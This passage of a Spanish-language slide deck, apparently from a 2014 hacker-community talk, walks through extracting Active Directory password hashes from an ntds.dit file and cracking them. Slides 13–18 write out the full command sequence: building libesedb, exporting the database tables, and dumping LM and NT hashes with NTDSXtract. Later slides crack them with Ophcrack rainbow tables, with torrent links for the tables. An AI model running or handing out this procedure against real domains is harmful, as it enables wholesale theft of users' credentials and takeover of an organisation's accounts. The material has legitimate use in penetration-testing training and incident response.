  • 13. Descarga e instalación de libesedb # wget http://libesedb.googlecode.com/files/libesedb-alpha- 20120102.tar.gz # tar -xzvf libesedb-alpha-20120102.tar.gz # cd libesedb-20120102 # ./configure # make # mv esedbtools/ /usr/local # cd esedbtools/
  • 14. esedbexport (parte de libesedb) • Syntaxis: #./esedbexport –t <directorio de salida> <archivo ntds.dit> • Este comando tardará mucho. Aprox 25 minutos. Si en 25 minutos parece que no esta avanzando hay que presionar Enter para actualizarlo. • La salida de comando debe ser similar a la siguiente diapositiva…
  • 15. # ./esedbexport -t ~/ntds ~/ntds.dit esedbexport 20120102 Opening file. Exporting table 1 (MSysObjects) out of 11. Exporting table 2 (MSysObjectsShadow) out of 11. Exporting table 3 (MSysUnicodeFixupVer1) out of 11. Exporting table 4 (datatable) out of 11. Exporting table 5 (link_table) out of 11. Exporting table 6 (hiddentable) out of 11. Exporting table 7 (sdproptable) out of 11. Exporting table 8 (sd_table) out of 11. Exporting table 9 (quota_table) out of 11. Exporting table 10 (quota_rebuild_progress_table) out of 11. Exporting table 11 (MSysDefrag1) out of 11. Export completed.
  • 16. Nombres de archivos exportados # ls ~/ntdis.export/ MSysObjects.0 MSysObjectsShadow.1 MSysUnicodeFixupVer1.2 datatable.3 link_table.4 hiddentable.5 sdproptable.6 sd_table.7 quota_table.8 quota_rebuild_progress_table.9 MSysDefrag1.10 • No utilizaremos todos los archivos, únicamente el datatable3, link_table.4 y el SYSTEM.
  • 17. Descarga e instalación de NTDSXtract # wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_2_beta.zip # unzip ntdsxtract_v1_2_beta.zip # cd ntdsxtract_v1_2_beta
  • 18. Extracción de hashes • # python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 ~/TEMP --passwordhashes -- lmoutfile LM.out --ntoutfile NT.out --pwdformat ophc -- syshive ~/SYSTEM • Se ejecuta un comando similar donde le estamos diciendo la ubicación del datatable.3, link_table.4 y SYSTEM y esperando el resultado de los hashes en formato ophc (Ophcrack). Nos generará dos archivos uno de hashes, uno para LM LM.out y otro de hashes NT NT.out.
  • 19. Descifrar (“Crackear”) los hashes Descargando Ophcrack, Obteniendo las Rainbow Tables, Crackeando los hashes
  • 20. Rainbow tables • El cifrado NTLM se puede romper utilizando Rainbow Tables que son tablas precomputadas de hashes. • Las tablas recomendadas ya que son relativamente pequeñas y se pueden obtener fácilmente son las XP_Special y las Vista_Special. • Las tablas son gratuitas. El sitio oficial de las tablas es: http://sourceforge.net/projects/ophcrack/files/tables/ pero por simplicidad de la descarga y velocidad recomiendo utilizar los torrents de • http://thepiratebay.se/torrent/4467431/Ophcrack_XP_Special_Tables • http://thepiratebay.se/torrent/4403978/Ophcrack_Vista_Special_NTHASH_Table
  • 21. Descargando e instalando Ophcrack • Ophcrack puede ser utilizado como un LiveCD o desde Windows. • Se descarga de http://ophcrack.sourceforge.net/ • En este tutorial utilizaremos la versión de Windows, la configuración es la misma en la versión LiveCD de Linux. • La diferencia principal es que la versión de LiveCD de Linux puede obtener automáticamente los hashes de la computadora donde se ejecuta.
  • 22. Utilizando Ophcrack • En el menú principal de Ophcrack se seleccciona Load y PWDUMP file • Abrimos el archivo de las contraseñas NT.out y/o LM.out
  • 23. Utilizando Ophcrack – Rainbow tables • En el menú principal de Ophcrack se seleccciona Tables y posteriormente Install. • Seleccionamos los directorios donde se encuentran las tablas Vista_special y XP_special. • Se recomienda habilitar una tabla a la vez, primero con XP_special.
  • 24. Crackeando las contraseñas • En el menú principal de Ophcrack seleccciona Crack. • El proceso puede tomar varias horas, pero el resultado vale la pena… 
  • 25. Como obtener contraseñas del directorio activo con permisos de Domain Admin Ing. Pedro Joaquín @_hkm Reunión de la Comunidad Underground de México 2014 28 de junio del 2014
  • 26. Referencias • Código Penal Federal, en materia de delitos en contra de medios o sistemas informáticos: http://gaceta.diputados.gob.mx/Gaceta/61/2012/mar/20120328-III.html#DictamenaD2 • Getting Hashes from NTDS.dit file: http://blog.walkerville.org/?p=486 • libesedb: https://code.google.com/p/libesedb/ • NTDSXtract: http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_2_beta.zip • Ophcrack: http://ophcrack.sourceforge.net/